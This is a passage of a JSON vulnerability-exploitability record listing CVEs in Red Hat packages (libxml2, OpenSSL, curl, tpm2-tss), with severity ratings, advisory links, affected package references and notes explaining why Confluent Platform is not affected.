          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29040"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6796-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-29040"
        }
      ],
      "published": "2024-06-28T21:15:02+00:00",
      "updated": "2026-04-15T00:35:42+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.2.3-1.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/tpm2-tss@3.2.3-1.el9?arch=x86_64&distro=redhat-9.7"
        }
      ]
    },
    {
      "id": "CVE-2024-34459",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        122
      ],
      "description": "An issue was discovered in xmllint (from libxml2) before 2.11.8 and 2.12.x before 2.12.7. Formatting error messages with xmllint --htmlout can result in a buffer over-read in xmlHTMLPrintFileContext in xmllint.c.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-34459"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-34459"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/issues/720"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.11.8"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/libxml2/-/releases/v2.12.7"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00014.html"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5HVUXKYTBWT3G5DEEQX62STJQBY367NL/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/INKSSLW5VMZIXHRPZBAW4TJUX5SQKARG/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VRDJCNQP32LV56KESUQ5SNZKAJWSZZRI/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5HVUXKYTBWT3G5DEEQX62STJQBY367NL/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/INKSSLW5VMZIXHRPZBAW4TJUX5SQKARG/"
        },
        {
          "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VRDJCNQP32LV56KESUQ5SNZKAJWSZZRI/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34459"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7240-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7302-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-34459"
        }
      ],
      "published": "2024-05-14T15:39:11+00:00",
      "updated": "2025-11-04T22:16:01+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.9.13-14.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/libxml2@2.9.13-14.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "The Java runtime that executes Confluent Platform is not linked against the vulnerable system library, so the vulnerable code path in the affected library is not reachable."
      }
    },
    {
      "id": "CVE-2024-41996",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        295
      ],
      "description": "Validating the order of the public keys in the Diffie-Hellman Key Agreement Protocol, when an approved safe prime is used, allows remote attackers (from the client side) to trigger unnecessarily expensive server-side DHE modular-exponentiation calculations. The client may cause asymmetric resource consumption. The basic attack scenario is that the client must claim that it can only communicate with DHE, and the server must be configured to allow DHE and validate the order of the public key.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-41996"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-41996"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-265688.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
        },
        {
          "url": "https://dheatattack.gitlab.io/details/"
        },
        {
          "url": "https://dheatattack.gitlab.io/faq/"
        },
        {
          "url": "https://gist.github.com/c0r0n3r/abccc14d4d96c0442f3a77fa5ca255d1"
        },
        {
          "url": "https://github.com/openssl/openssl/issues/17374"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-41996"
        },
        {
          "url": "https://openssl-library.org/post/2022-10-21-tls-groups-configuration/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-41996"
        }
      ],
      "published": "2024-08-26T06:15:04+00:00",
      "updated": "2026-05-12T12:17:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1",
          "versions": [
            {
              "version": "1:3.5.1-7.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/openssl@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/openssl-libs@3.5.1-7.el9_7?arch=x86_64&distro=redhat-9.7&epoch=1"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "The Java runtime that executes Confluent Platform does not invoke any binaries present in the container, so the vulnerable code path in the affected application is not reachable."
      }
    },
    {
      "id": "CVE-2024-7264",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:H"
        },
        {
          "source": {
            "name": "rocky"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        125
      ],
      "description": "libcurl's ASN1 parser code has the `GTime2str()` function, used for parsing an\nASN.1 Generalized Time field. If given an syntactically incorrect field, the\nparser might end up using -1 for the length of the *time fraction*, leading to\na `strlen()` getting performed on a pointer to a heap buffer area that is not\n(purposely) null terminated.\n\nThis flaw most likely leads to a crash, but can also lead to heap contents\ngetting returned to the application when\n[CURLINFO_CERTINFO](https://curl.se/libcurl/c/CURLINFO_CERTINFO.html) is used.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2024-7264"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2024/07/31/1"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2025:1671"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2024-7264"
        },
        {
          "url": "https://bugzilla.redhat.com/2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/2339305"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294581"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2294676"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2301888"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318857"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318858"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318870"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318873"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318874"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318876"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318882"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318883"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318884"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318885"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318886"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318897"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318900"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318905"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318914"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318922"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318923"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318925"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318926"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2318927"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2331191"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339218"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339220"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339221"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339226"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339231"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339236"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339238"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339243"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339247"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339252"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339259"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339266"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339270"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339271"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339275"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339277"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339281"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339284"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339291"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339293"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339295"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339299"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339300"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339304"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2339305"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2024-7264.json"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11053"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21193"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21194"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21196"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21197"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21198"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21199"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21201"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21203"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21212"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21213"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21218"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21219"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21230"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21231"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21236"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21237"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21238"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21239"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21241"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21247"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37371"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-5535"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-7264"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21490"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21491"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21494"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21497"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21500"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21501"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21503"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21504"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21505"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21518"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21519"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21520"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21521"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21522"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21523"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21525"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21529"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21531"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21534"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21536"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21540"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21543"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21546"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21555"
        },
        {
          "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-21559"
        },
        {
          "url": "https://errata.almalinux.org/9/ALSA-2025-1671.html"
        },
        {
          "url": "https://errata.rockylinux.org/RLSA-2025:1671"
        },
        {
          "url": "https://github.com/curl/curl/commit/27959ecce75cdb2809c0bdb3286e60e08fadb519"
        },
        {
          "url": "https://hackerone.com/reports/2629968"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2024-7264.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2025-1673.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-7264"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20240828-0008/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0006/"
        },
        {
          "url": "https://security.netapp.com/advisory/ntap-20241025-0010/"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-6944-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2024-7264"
        },
        {
          "url": "https://www.oracle.com/security-alerts/cpuoct2024.html#AppendixMSQL"
        }
      ],
      "published": "2024-07-31T08:15:02+00:00",
      "updated": "2025-11-03T23:17:31+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "7.76.1-35.el9_7.3",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/curl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/libcurl-minimal@7.76.1-35.el9_7.3?arch=x86_64&distro=redhat-9.7"
        },
        {
